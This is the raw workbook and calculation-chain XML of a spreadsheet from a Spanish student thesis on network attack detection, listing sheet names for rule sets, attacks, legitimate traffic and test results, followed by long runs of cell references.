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ignac\Documents\TFG - Detección de ataques en red\7a Parte Marzo 2026\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{FEA99B25-DBD6-45D5-93C5-723B75DAF997}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-105" yWindow="0" windowWidth="19410" windowHeight="20985" firstSheet="6" activeTab="7" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="RuleSets" sheetId="41" r:id="rId1"/>
    <sheet name="Tabla 3 (Legítimo)" sheetId="35" r:id="rId2"/>
    <sheet name="T2 (At) S&lt;=4, FG&gt;=1" sheetId="32" r:id="rId3"/>
    <sheet name="T4 (Rend) S&lt;=4, FG&gt;=1" sheetId="34" r:id="rId4"/>
    <sheet name="T5 (Pru) S&lt;=4,FG&gt;=1" sheetId="40" r:id="rId5"/>
    <sheet name="T2 (At) S&lt;=3, FG&gt;=2" sheetId="45" r:id="rId6"/>
    <sheet name="T4 (Rend) S&lt;=3, FG&gt;=2" sheetId="49" r:id="rId7"/>
    <sheet name="T5 (Pru) S&lt;=3,FG&gt;=2" sheetId="53" r:id="rId8"/>
    <sheet name="T2 (At) S&lt;=2, FG&gt;=3" sheetId="46" r:id="rId9"/>
    <sheet name="T4 (Rend) S&lt;=2, FG&gt;=3" sheetId="50" r:id="rId10"/>
    <sheet name="T5 (Pru) S&lt;=2,FG&gt;=3" sheetId="54" r:id="rId11"/>
    <sheet name="T2 (At) S&lt;=1, FG&gt;=4" sheetId="47" r:id="rId12"/>
    <sheet name="T4 (Rend) S&lt;=1, FG&gt;=4" sheetId="51" r:id="rId13"/>
    <sheet name="T5 (Pru) S&lt;=1,FG&gt;=4" sheetId="55" r:id="rId14"/>
    <sheet name="T2 (At) FG&gt;=5" sheetId="48" r:id="rId15"/>
    <sheet name="T4 (Rend) FG&gt;=5" sheetId="52" r:id="rId16"/>
    <sheet name="T5 (Pru) FG&gt;=5" sheetId="56" r:id="rId17"/>
    <sheet name="Separador" sheetId="30" r:id="rId18"/>
    <sheet name="Tabla 2 - Ataques detec (Imple)" sheetId="27" r:id="rId19"/>
    <sheet name="Techniques" sheetId="33" r:id="rId20"/>
    <sheet name="(A) Ataques" sheetId="38" r:id="rId21"/>
    <sheet name="(B) Legitimo" sheetId="39" r:id="rId22"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="20" hidden="1">'(A) Ataques'!$A$2:$MQ$116</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="14" hidden="1">'T2 (At) FG&gt;=5'!$A$2:$AB$79</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="11" hidden="1">'T2 (At) S&lt;=1, FG&gt;=4'!$A$2:$AC$79</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="8" hidden="1">'T2 (At) S&lt;=2, FG&gt;=3'!$A$2:$AC$79</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="5" hidden="1">'T2 (At) S&lt;=3, FG&gt;=2'!$A$2:$AC$79</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">'T2 (At) S&lt;=4, FG&gt;=1'!$A$2:$AC$79</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="18" hidden="1">'Tabla 2 - Ataques detec (Imple)'!$B$2:$AX$113</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="19" hidden="1">Techniques!$B$2:$H$218</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="14">'T2 (At) FG&gt;=5'!$A$1:$AB$77</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="11">'T2 (At) S&lt;=1, FG&gt;=4'!$A$1:$AC$77</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="8">'T2 (At) S&lt;=2, FG&gt;=3'!$A$1:$AC$77</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="5">'T2 (At) S&lt;=3, FG&gt;=2'!$A$1:$AC$77</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="2">'T2 (At) S&lt;=4, FG&gt;=1'!$A$1:$AP$79</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="15">'T4 (Rend) FG&gt;=5'!$A$2:$H$27</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="12">'T4 (Rend) S&lt;=1, FG&gt;=4'!$A$2:$H$27</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="9">'T4 (Rend) S&lt;=2, FG&gt;=3'!$A$2:$H$27</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="6">'T4 (Rend) S&lt;=3, FG&gt;=2'!$A$2:$H$27</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="3">'T4 (Rend) S&lt;=4, FG&gt;=1'!$A$2:$H$27</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="16">'T5 (Pru) FG&gt;=5'!$A$2:$N$55</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="13">'T5 (Pru) S&lt;=1,FG&gt;=4'!$A$2:$N$55</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="10">'T5 (Pru) S&lt;=2,FG&gt;=3'!$A$2:$N$55</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="7">'T5 (Pru) S&lt;=3,FG&gt;=2'!$A$2:$N$55</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="4">'T5 (Pru) S&lt;=4,FG&gt;=1'!$A$2:$N$55</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="18">'Tabla 2 - Ataques detec (Imple)'!$A$1:$Y$112</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="1">'Tabla 3 (Legítimo)'!#REF!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56" l="1"/>
  <c r="K16" i="56"/>
  <c r="N34" i="56"/>
  <c r="M34" i="56"/>
  <c r="L34" i="56"/>
  <c r="K34" i="56"/>
  <c r="L25" i="56"/>
  <c r="K25" i="56"/>
  <c r="N43" i="56"/>
  <c r="M43" i="56"/>
  <c r="L43" i="56"/>
  <c r="K43" i="56"/>
  <c r="L52" i="56"/>
  <c r="M52" i="56"/>
  <c r="N52" i="56"/>
  <c r="K52" i="56"/>
  <c r="L43" i="55"/>
  <c r="M43" i="55"/>
  <c r="N43" i="55"/>
  <c r="K43" i="55"/>
  <c r="L43" i="54"/>
  <c r="M43" i="54"/>
  <c r="N43" i="54"/>
  <c r="K43" i="54"/>
  <c r="L43" i="53"/>
  <c r="M43" i="53"/>
  <c r="N43" i="53"/>
  <c r="K43" i="53"/>
  <c r="L43" i="40"/>
  <c r="M43" i="40"/>
  <c r="N43" i="40"/>
  <c r="K43" i="40"/>
  <c r="CD78" i="32"/>
  <c r="CD77" i="32"/>
  <c r="CD76" i="32"/>
  <c r="CD75" i="32"/>
  <c r="CD74" i="32"/>
  <c r="CD73" i="32"/>
  <c r="CD72" i="32"/>
  <c r="CD71" i="32"/>
  <c r="CD70" i="32"/>
  <c r="CD69" i="32"/>
  <c r="CD68" i="32"/>
  <c r="CD67" i="32"/>
  <c r="CD66" i="32"/>
  <c r="CD65" i="32"/>
  <c r="CD64" i="32"/>
  <c r="CD63" i="32"/>
  <c r="CD62" i="32"/>
  <c r="CD61" i="32"/>
  <c r="CD60" i="32"/>
  <c r="CD59" i="32"/>
  <c r="CD58" i="32"/>
  <c r="CD57" i="32"/>
  <c r="CD56" i="32"/>
  <c r="CD55" i="32"/>
  <c r="CD54" i="32"/>
  <c r="CD53" i="32"/>
  <c r="CD52" i="32"/>
  <c r="CD51" i="32"/>
  <c r="CD50" i="32"/>
  <c r="CD49" i="32"/>
  <c r="CD48" i="32"/>
  <c r="CD47" i="32"/>
  <c r="CD46" i="32"/>
  <c r="CD45" i="32"/>
  <c r="CD44" i="32"/>
  <c r="CD43" i="32"/>
  <c r="CD42" i="32"/>
  <c r="CD41" i="32"/>
  <c r="CD40" i="32"/>
  <c r="CD39" i="32"/>
  <c r="CD38" i="32"/>
  <c r="CD37" i="32"/>
  <c r="CD36" i="32"/>
  <c r="CD35" i="32"/>
  <c r="CD34" i="32"/>
  <c r="CD33" i="32"/>
  <c r="CD32" i="32"/>
  <c r="CD31" i="32"/>
  <c r="CD30" i="32"/>
  <c r="CD29" i="32"/>
  <c r="CD28" i="32"/>
  <c r="CD27" i="32"/>
  <c r="CD26" i="32"/>
  <c r="CD25" i="32"/>
  <c r="CD24" i="32"/>
  <c r="CD23" i="32"/>
  <c r="CD22" i="32"/>
  <c r="CD21" i="32"/>
  <c r="CD20" i="32"/>
  <c r="CD19" i="32"/>
  <c r="CD18" i="32"/>
  <c r="CD17" i="32"/>
  <c r="CD16" i="32"/>
  <c r="CD15" i="32"/>
  <c r="CD14" i="32"/>
  <c r="CD13" i="32"/>
  <c r="CD12" i="32"/>
  <c r="CD11" i="32"/>
  <c r="CD10" i="32"/>
  <c r="CD9" i="32"/>
  <c r="CD8" i="32"/>
  <c r="CD7" i="32"/>
  <c r="CD6" i="32"/>
  <c r="CD5" i="32"/>
  <c r="CD4" i="32"/>
  <c r="CD3" i="32"/>
  <c r="BX4" i="32"/>
  <c r="BX5" i="32"/>
  <c r="BX6" i="32"/>
  <c r="BX7" i="32"/>
  <c r="BX8" i="32"/>
  <c r="BX9" i="32"/>
  <c r="BX10" i="32"/>
  <c r="BX11" i="32"/>
  <c r="BX12" i="32"/>
  <c r="BX13" i="32"/>
  <c r="BX14" i="32"/>
  <c r="BX15" i="32"/>
  <c r="BX16" i="32"/>
  <c r="BX17" i="32"/>
  <c r="BX18" i="32"/>
  <c r="BX19" i="32"/>
  <c r="BX20" i="32"/>
  <c r="BX21" i="32"/>
  <c r="BX22" i="32"/>
  <c r="BX23" i="32"/>
  <c r="BX24" i="32"/>
  <c r="BX25" i="32"/>
  <c r="BX26" i="32"/>
  <c r="BX27" i="32"/>
  <c r="BX28" i="32"/>
  <c r="BX29" i="32"/>
  <c r="BX30" i="32"/>
  <c r="BX31" i="32"/>
  <c r="BX32" i="32"/>
  <c r="BX33" i="32"/>
  <c r="BX34" i="32"/>
  <c r="BX35" i="32"/>
  <c r="BX36" i="32"/>
  <c r="BX37" i="32"/>
  <c r="BX38" i="32"/>
  <c r="BX39" i="32"/>
  <c r="BX40" i="32"/>
  <c r="BX41" i="32"/>
  <c r="BX42" i="32"/>
  <c r="BX43" i="32"/>
  <c r="BX44" i="32"/>
  <c r="BX45" i="32"/>
  <c r="BX46" i="32"/>
  <c r="BX47" i="32"/>
  <c r="BX48" i="32"/>
  <c r="BX49" i="32"/>
  <c r="BX50" i="32"/>
  <c r="BX51" i="32"/>
  <c r="BX52" i="32"/>
  <c r="BX53" i="32"/>
  <c r="BX54" i="32"/>
  <c r="BX55" i="32"/>
  <c r="BX56" i="32"/>
  <c r="BX57" i="32"/>
  <c r="BX58" i="32"/>
  <c r="BX59" i="32"/>
  <c r="BX60" i="32"/>
  <c r="BX61" i="32"/>
  <c r="BX62" i="32"/>
  <c r="BX63" i="32"/>
  <c r="BX64" i="32"/>
  <c r="BX65" i="32"/>
  <c r="BX66" i="32"/>
  <c r="BX67" i="32"/>
  <c r="BX68" i="32"/>
  <c r="BX69" i="32"/>
  <c r="BX70" i="32"/>
  <c r="BX71" i="32"/>
  <c r="BX72" i="32"/>
  <c r="BX73" i="32"/>
  <c r="BX74" i="32"/>
  <c r="BX75" i="32"/>
  <c r="BX76" i="32"/>
  <c r="BX77" i="32"/>
  <c r="BX78" i="32"/>
  <c r="BX3" i="32"/>
  <c r="BD4" i="27"/>
  <c r="BI4" i="27" s="1"/>
  <c r="BE4" i="27"/>
  <c r="BF4" i="27"/>
  <c r="BG4" i="27"/>
  <c r="BH4" i="27"/>
  <c r="BJ4" i="27"/>
  <c r="BN4" i="27" s="1"/>
  <c r="BK4" i="27"/>
  <c r="BL4" i="27"/>
  <c r="BM4" i="27"/>
  <c r="BO4" i="27"/>
  <c r="BT4" i="27" s="1"/>
  <c r="BP4" i="27"/>
  <c r="BQ4" i="27"/>
  <c r="BR4" i="27"/>
  <c r="BS4" i="27"/>
  <c r="BD5" i="27"/>
  <c r="BI5" i="27" s="1"/>
  <c r="BE5" i="27"/>
  <c r="BF5" i="27"/>
  <c r="BG5" i="27"/>
  <c r="BH5" i="27"/>
  <c r="BJ5" i="27"/>
  <c r="BN5" i="27" s="1"/>
  <c r="BK5" i="27"/>
  <c r="BL5" i="27"/>
  <c r="BM5" i="27"/>
  <c r="BO5" i="27"/>
  <c r="BT5" i="27" s="1"/>
  <c r="BP5" i="27"/>
  <c r="BQ5" i="27"/>
  <c r="BR5" i="27"/>
  <c r="BS5" i="27"/>
  <c r="BJ6" i="27"/>
  <c r="BN6" i="27" s="1"/>
  <c r="BK6" i="27"/>
  <c r="BL6" i="27"/>
  <c r="BM6" i="27"/>
  <c r="BD7" i="27"/>
  <c r="BI7" i="27" s="1"/>
  <c r="BE7" i="27"/>
  <c r="BF7" i="27"/>
  <c r="BG7" i="27"/>
  <c r="BH7" i="27"/>
  <c r="BJ7" i="27"/>
  <c r="BN7" i="27" s="1"/>
  <c r="BK7" i="27"/>
  <c r="BL7" i="27"/>
  <c r="BM7" i="27"/>
  <c r="BO7" i="27"/>
  <c r="BT7" i="27" s="1"/>
  <c r="BP7" i="27"/>
  <c r="BQ7" i="27"/>
  <c r="BR7" i="27"/>
  <c r="BS7" i="27"/>
  <c r="BD8" i="27"/>
  <c r="BI8" i="27" s="1"/>
  <c r="BE8" i="27"/>
  <c r="BF8" i="27"/>
  <c r="BG8" i="27"/>
  <c r="BH8" i="27"/>
  <c r="BJ8" i="27"/>
  <c r="BN8" i="27" s="1"/>
  <c r="BK8" i="27"/>
  <c r="BL8" i="27"/>
  <c r="BM8" i="27"/>
  <c r="BO8" i="27"/>
  <c r="BT8" i="27" s="1"/>
  <c r="BP8" i="27"/>
  <c r="BQ8" i="27"/>
  <c r="BR8" i="27"/>
  <c r="BS8" i="27"/>
  <c r="BD9" i="27"/>
  <c r="BI9" i="27" s="1"/>
  <c r="BE9" i="27"/>
  <c r="BF9" i="27"/>
  <c r="BG9" i="27"/>
  <c r="BH9" i="27"/>
  <c r="BJ9" i="27"/>
  <c r="BN9" i="27" s="1"/>
  <c r="BK9" i="27"/>
  <c r="BL9" i="27"/>
  <c r="BM9" i="27"/>
  <c r="BO9" i="27"/>
  <c r="BP9" i="27"/>
  <c r="BQ9" i="27"/>
  <c r="BR9" i="27"/>
  <c r="BS9" i="27"/>
  <c r="BT9" i="27"/>
  <c r="BD10" i="27"/>
  <c r="BE10" i="27"/>
  <c r="BF10" i="27"/>
  <c r="BG10" i="27"/>
  <c r="BH10" i="27"/>
  <c r="BI10" i="27"/>
  <c r="BJ10" i="27"/>
  <c r="BN10" i="27" s="1"/>
  <c r="BK10" i="27"/>
  <c r="BL10" i="27"/>
  <c r="BM10" i="27"/>
  <c r="BO10" i="27"/>
  <c r="BP10" i="27"/>
  <c r="BQ10" i="27"/>
  <c r="BR10" i="27"/>
  <c r="BS10" i="27"/>
  <c r="BT10" i="27"/>
  <c r="BJ11" i="27"/>
  <c r="BN11" i="27" s="1"/>
  <c r="BK11" i="27"/>
  <c r="BL11" i="27"/>
  <c r="BM11" i="27"/>
  <c r="BJ12" i="27"/>
  <c r="BN12" i="27" s="1"/>
  <c r="BK12" i="27"/>
  <c r="BL12" i="27"/>
  <c r="BM12" i="27"/>
  <c r="BD13" i="27"/>
  <c r="BE13" i="27"/>
  <c r="BF13" i="27"/>
  <c r="BG13" i="27"/>
  <c r="BH13" i="27"/>
  <c r="BI13" i="27"/>
  <c r="BJ13" i="27"/>
  <c r="BN13" i="27" s="1"/>
  <c r="BK13" i="27"/>
  <c r="BL13" i="27"/>
  <c r="BM13" i="27"/>
  <c r="BO13" i="27"/>
  <c r="BP13" i="27"/>
  <c r="BQ13" i="27"/>
  <c r="BR13" i="27"/>
  <c r="BS13" i="27"/>
  <c r="BT13" i="27"/>
  <c r="BD14" i="27"/>
  <c r="BE14" i="27"/>
  <c r="BF14" i="27"/>
  <c r="BG14" i="27"/>
  <c r="BH14" i="27"/>
  <c r="BI14" i="27"/>
  <c r="BJ14" i="27"/>
  <c r="BN14" i="27" s="1"/>
  <c r="BK14" i="27"/>
  <c r="BL14" i="27"/>
  <c r="BM14" i="27"/>
  <c r="BO14" i="27"/>
  <c r="BP14" i="27"/>
  <c r="BQ14" i="27"/>
  <c r="BR14" i="27"/>
  <c r="BS14" i="27"/>
  <c r="BT14" i="27"/>
  <c r="BD15" i="27"/>
  <c r="BI15" i="27" s="1"/>
  <c r="BE15" i="27"/>
  <c r="BF15" i="27"/>
  <c r="BG15" i="27"/>
  <c r="BH15" i="27"/>
  <c r="BJ15" i="27"/>
  <c r="BN15" i="27" s="1"/>
  <c r="BK15" i="27"/>
  <c r="BL15" i="27"/>
  <c r="BM15" i="27"/>
  <c r="BO15" i="27"/>
  <c r="BP15" i="27"/>
  <c r="BQ15" i="27"/>
  <c r="BR15" i="27"/>
  <c r="BS15" i="27"/>
  <c r="BT15" i="27"/>
  <c r="BD16" i="27"/>
  <c r="BI16" i="27" s="1"/>
  <c r="BE16" i="27"/>
  <c r="BF16" i="27"/>
  <c r="BG16" i="27"/>
  <c r="BH16" i="27"/>
  <c r="BJ16" i="27"/>
  <c r="BN16" i="27" s="1"/>
  <c r="BK16" i="27"/>
  <c r="BL16" i="27"/>
  <c r="BM16" i="27"/>
  <c r="BO16" i="27"/>
  <c r="BP16" i="27"/>
  <c r="BQ16" i="27"/>
  <c r="BR16" i="27"/>
  <c r="BS16" i="27"/>
  <c r="BT16" i="27"/>
  <c r="BJ17" i="27"/>
  <c r="BN17" i="27" s="1"/>
  <c r="BK17" i="27"/>
  <c r="BL17" i="27"/>
  <c r="BM17" i="27"/>
  <c r="BD18" i="27"/>
  <c r="BI18" i="27" s="1"/>
  <c r="BE18" i="27"/>
  <c r="BF18" i="27"/>
  <c r="BG18" i="27"/>
  <c r="BH18" i="27"/>
  <c r="BJ18" i="27"/>
  <c r="BN18" i="27" s="1"/>
  <c r="BK18" i="27"/>
  <c r="BL18" i="27"/>
  <c r="BM18" i="27"/>
  <c r="BO18" i="27"/>
  <c r="BP18" i="27"/>
  <c r="BQ18" i="27"/>
  <c r="BR18" i="27"/>
  <c r="BS18" i="27"/>
  <c r="BT18" i="27"/>
  <c r="BJ19" i="27"/>
  <c r="BN19" i="27" s="1"/>
  <c r="BK19" i="27"/>
  <c r="BL19" i="27"/>
  <c r="BM19" i="27"/>
  <c r="BD20" i="27"/>
  <c r="BE20" i="27"/>
  <c r="BF20" i="27"/>
  <c r="BG20" i="27"/>
  <c r="BH20" i="27"/>
  <c r="BI20" i="27"/>
  <c r="BJ20" i="27"/>
  <c r="BK20" i="27"/>
  <c r="BL20" i="27"/>
  <c r="BM20" i="27"/>
  <c r="BN20" i="27"/>
  <c r="BO20" i="27"/>
  <c r="BT20" i="27" s="1"/>
  <c r="BP20" i="27"/>
  <c r="BQ20" i="27"/>
  <c r="BR20" i="27"/>
  <c r="BS20" i="27"/>
  <c r="BD21" i="27"/>
  <c r="BE21" i="27"/>
  <c r="BF21" i="27"/>
  <c r="BG21" i="27"/>
  <c r="BH21" i="27"/>
  <c r="BI21" i="27"/>
  <c r="BJ21" i="27"/>
  <c r="BK21" i="27"/>
  <c r="BL21" i="27"/>
  <c r="BM21" i="27"/>
  <c r="BN21" i="27"/>
  <c r="BO21" i="27"/>
  <c r="BT21" i="27" s="1"/>
  <c r="BP21" i="27"/>
  <c r="BQ21" i="27"/>
  <c r="BR21" i="27"/>
  <c r="BS21" i="27"/>
  <c r="BJ22" i="27"/>
  <c r="BK22" i="27"/>
  <c r="BL22" i="27"/>
  <c r="BM22" i="27"/>
  <c r="BN22" i="27"/>
  <c r="BD23" i="27"/>
  <c r="BE23" i="27"/>
  <c r="BF23" i="27"/>
  <c r="BG23" i="27"/>
  <c r="BH23" i="27"/>
  <c r="BI23" i="27"/>
  <c r="BJ23" i="27"/>
  <c r="BK23" i="27"/>
  <c r="BL23" i="27"/>
  <c r="BM23" i="27"/>
  <c r="BN23" i="27"/>
  <c r="BO23" i="27"/>
  <c r="BT23" i="27" s="1"/>
  <c r="BP23" i="27"/>
  <c r="BQ23" i="27"/>
  <c r="BR23" i="27"/>
  <c r="BS23" i="27"/>
  <c r="BD24" i="27"/>
  <c r="BE24" i="27"/>
  <c r="BF24" i="27"/>
  <c r="BG24" i="27"/>
  <c r="BH24" i="27"/>
  <c r="BI24" i="27"/>
  <c r="BJ24" i="27"/>
  <c r="BK24" i="27"/>
  <c r="BL24" i="27"/>
  <c r="BM24" i="27"/>
  <c r="BN24" i="27"/>
  <c r="BO24" i="27"/>
  <c r="BT24" i="27" s="1"/>
  <c r="BP24" i="27"/>
  <c r="BQ24" i="27"/>
  <c r="BR24" i="27"/>
  <c r="BS24" i="27"/>
  <c r="BJ25" i="27"/>
  <c r="BK25" i="27"/>
  <c r="BL25" i="27"/>
  <c r="BM25" i="27"/>
  <c r="BN25" i="27"/>
  <c r="BD26" i="27"/>
  <c r="BI26" i="27" s="1"/>
  <c r="BE26" i="27"/>
  <c r="BF26" i="27"/>
  <c r="BG26" i="27"/>
  <c r="BH26" i="27"/>
  <c r="BJ26" i="27"/>
  <c r="BN26" i="27" s="1"/>
  <c r="BK26" i="27"/>
  <c r="BL26" i="27"/>
  <c r="BM26" i="27"/>
  <c r="BO26" i="27"/>
  <c r="BT26" i="27" s="1"/>
  <c r="BP26" i="27"/>
  <c r="BQ26" i="27"/>
  <c r="BR26" i="27"/>
  <c r="BS26" i="27"/>
  <c r="BJ27" i="27"/>
  <c r="BN27" i="27" s="1"/>
  <c r="BK27" i="27"/>
  <c r="BL27" i="27"/>
  <c r="BM27" i="27"/>
  <c r="BJ28" i="27"/>
  <c r="BN28" i="27" s="1"/>
  <c r="BK28" i="27"/>
  <c r="BL28" i="27"/>
  <c r="BM28" i="27"/>
  <c r="BJ29" i="27"/>
  <c r="BN29" i="27" s="1"/>
  <c r="BK29" i="27"/>
  <c r="BL29" i="27"/>
  <c r="BM29" i="27"/>
  <c r="BJ30" i="27"/>
  <c r="BK30" i="27"/>
  <c r="BL30" i="27"/>
  <c r="BM30" i="27"/>
  <c r="BN30" i="27"/>
  <c r="BD31" i="27"/>
  <c r="BI31" i="27" s="1"/>
  <c r="BE31" i="27"/>
  <c r="BF31" i="27"/>
  <c r="BG31" i="27"/>
  <c r="BH31" i="27"/>
  <c r="BJ31" i="27"/>
  <c r="BK31" i="27"/>
  <c r="BL31" i="27"/>
  <c r="BM31" i="27"/>
  <c r="BN31" i="27"/>
  <c r="BO31" i="27"/>
  <c r="BP31" i="27"/>
  <c r="BQ31" i="27"/>
  <c r="BR31" i="27"/>
  <c r="BS31" i="27"/>
  <c r="BT31" i="27"/>
  <c r="BJ32" i="27"/>
  <c r="BK32" i="27"/>
  <c r="BL32" i="27"/>
  <c r="BM32" i="27"/>
  <c r="BN32" i="27"/>
  <c r="BJ33" i="27"/>
  <c r="BK33" i="27"/>
  <c r="BL33" i="27"/>
  <c r="BM33" i="27"/>
  <c r="BN33" i="27"/>
  <c r="BD34" i="27"/>
  <c r="BI34" i="27" s="1"/>
  <c r="BE34" i="27"/>
  <c r="BF34" i="27"/>
  <c r="BG34" i="27"/>
  <c r="BH34" i="27"/>
  <c r="BJ34" i="27"/>
  <c r="BK34" i="27"/>
  <c r="BL34" i="27"/>
  <c r="BM34" i="27"/>
  <c r="BN34" i="27"/>
  <c r="BO34" i="27"/>
  <c r="BP34" i="27"/>
  <c r="BQ34" i="27"/>
  <c r="BR34" i="27"/>
  <c r="BS34" i="27"/>
  <c r="BT34" i="27"/>
  <c r="BD35" i="27"/>
  <c r="BI35" i="27" s="1"/>
  <c r="BE35" i="27"/>
  <c r="BF35" i="27"/>
  <c r="BG35" i="27"/>
  <c r="BH35" i="27"/>
  <c r="BJ35" i="27"/>
  <c r="BK35" i="27"/>
  <c r="BL35" i="27"/>
  <c r="BM35" i="27"/>
  <c r="BN35" i="27"/>
  <c r="BO35" i="27"/>
  <c r="BP35" i="27"/>
  <c r="BQ35" i="27"/>
  <c r="BR35" i="27"/>
  <c r="BS35" i="27"/>
  <c r="BT35" i="27"/>
  <c r="BD36" i="27"/>
  <c r="BI36" i="27" s="1"/>
  <c r="BE36" i="27"/>
  <c r="BF36" i="27"/>
  <c r="BG36" i="27"/>
  <c r="BH36" i="27"/>
  <c r="BJ36" i="27"/>
  <c r="BN36" i="27" s="1"/>
  <c r="BK36" i="27"/>
  <c r="BL36" i="27"/>
  <c r="BM36" i="27"/>
  <c r="BO36" i="27"/>
  <c r="BT36" i="27" s="1"/>
  <c r="BP36" i="27"/>
  <c r="BQ36" i="27"/>
  <c r="BR36" i="27"/>
  <c r="BS36" i="27"/>
  <c r="BD37" i="27"/>
  <c r="BI37" i="27" s="1"/>
  <c r="BE37" i="27"/>
  <c r="BF37" i="27"/>
  <c r="BG37" i="27"/>
  <c r="BH37" i="27"/>
  <c r="BJ37" i="27"/>
  <c r="BK37" i="27"/>
  <c r="BL37" i="27"/>
  <c r="BM37" i="27"/>
  <c r="BN37" i="27"/>
  <c r="BO37" i="27"/>
  <c r="BT37" i="27" s="1"/>
  <c r="BP37" i="27"/>
  <c r="BQ37" i="27"/>
  <c r="BR37" i="27"/>
  <c r="BS37" i="27"/>
  <c r="BD38" i="27"/>
  <c r="BI38" i="27" s="1"/>
  <c r="BE38" i="27"/>
  <c r="BF38" i="27"/>
  <c r="BG38" i="27"/>
  <c r="BH38" i="27"/>
  <c r="BJ38" i="27"/>
  <c r="BK38" i="27"/>
  <c r="BL38" i="27"/>
  <c r="BM38" i="27"/>
  <c r="BN38" i="27"/>
  <c r="BO38" i="27"/>
  <c r="BT38" i="27" s="1"/>
  <c r="BP38" i="27"/>
  <c r="BQ38" i="27"/>
  <c r="BR38" i="27"/>
  <c r="BS38" i="27"/>
  <c r="BD39" i="27"/>
  <c r="BI39" i="27" s="1"/>
  <c r="BE39" i="27"/>
  <c r="BF39" i="27"/>
  <c r="BG39" i="27"/>
  <c r="BH39" i="27"/>
  <c r="BJ39" i="27"/>
  <c r="BK39" i="27"/>
  <c r="BL39" i="27"/>
  <c r="BM39" i="27"/>
  <c r="BN39" i="27"/>
  <c r="BO39" i="27"/>
  <c r="BT39" i="27" s="1"/>
  <c r="BP39" i="27"/>
  <c r="BQ39" i="27"/>
  <c r="BR39" i="27"/>
  <c r="BS39" i="27"/>
  <c r="BJ40" i="27"/>
  <c r="BK40" i="27"/>
  <c r="BL40" i="27"/>
  <c r="BM40" i="27"/>
  <c r="BN40" i="27"/>
  <c r="BD41" i="27"/>
  <c r="BI41" i="27" s="1"/>
  <c r="BE41" i="27"/>
  <c r="BF41" i="27"/>
  <c r="BG41" i="27"/>
  <c r="BH41" i="27"/>
  <c r="BJ41" i="27"/>
  <c r="BK41" i="27"/>
  <c r="BL41" i="27"/>
  <c r="BM41" i="27"/>
  <c r="BN41" i="27"/>
  <c r="BO41" i="27"/>
  <c r="BP41" i="27"/>
  <c r="BQ41" i="27"/>
  <c r="BR41" i="27"/>
  <c r="BS41" i="27"/>
  <c r="BT41" i="27"/>
  <c r="BD42" i="27"/>
  <c r="BI42" i="27" s="1"/>
  <c r="BE42" i="27"/>
  <c r="BF42" i="27"/>
  <c r="BG42" i="27"/>
  <c r="BH42" i="27"/>
  <c r="BJ42" i="27"/>
  <c r="BN42" i="27" s="1"/>
  <c r="BK42" i="27"/>
  <c r="BL42" i="27"/>
  <c r="BM42" i="27"/>
  <c r="BO42" i="27"/>
  <c r="BP42" i="27"/>
  <c r="BQ42" i="27"/>
  <c r="BR42" i="27"/>
  <c r="BS42" i="27"/>
  <c r="BT42" i="27"/>
  <c r="BD43" i="27"/>
  <c r="BI43" i="27" s="1"/>
  <c r="BE43" i="27"/>
  <c r="BF43" i="27"/>
  <c r="BG43" i="27"/>
  <c r="BH43" i="27"/>
  <c r="BJ43" i="27"/>
  <c r="BN43" i="27" s="1"/>
  <c r="BK43" i="27"/>
  <c r="BL43" i="27"/>
  <c r="BM43" i="27"/>
  <c r="BO43" i="27"/>
  <c r="BP43" i="27"/>
  <c r="BQ43" i="27"/>
  <c r="BR43" i="27"/>
  <c r="BS43" i="27"/>
  <c r="BT43" i="27"/>
  <c r="BD44" i="27"/>
  <c r="BI44" i="27" s="1"/>
  <c r="BE44" i="27"/>
  <c r="BF44" i="27"/>
  <c r="BG44" i="27"/>
  <c r="BH44" i="27"/>
  <c r="BJ44" i="27"/>
  <c r="BN44" i="27" s="1"/>
  <c r="BK44" i="27"/>
  <c r="BL44" i="27"/>
  <c r="BM44" i="27"/>
  <c r="BO44" i="27"/>
  <c r="BP44" i="27"/>
  <c r="BQ44" i="27"/>
  <c r="BR44" i="27"/>
  <c r="BS44" i="27"/>
  <c r="BT44" i="27"/>
  <c r="BJ45" i="27"/>
  <c r="BN45" i="27" s="1"/>
  <c r="BK45" i="27"/>
  <c r="BL45" i="27"/>
  <c r="BM45" i="27"/>
  <c r="BD46" i="27"/>
  <c r="BI46" i="27" s="1"/>
  <c r="BE46" i="27"/>
  <c r="BF46" i="27"/>
  <c r="BG46" i="27"/>
  <c r="BH46" i="27"/>
  <c r="BJ46" i="27"/>
  <c r="BN46" i="27" s="1"/>
  <c r="BK46" i="27"/>
  <c r="BL46" i="27"/>
  <c r="BM46" i="27"/>
  <c r="BO46" i="27"/>
  <c r="BP46" i="27"/>
  <c r="BQ46" i="27"/>
  <c r="BR46" i="27"/>
  <c r="BS46" i="27"/>
  <c r="BT46" i="27"/>
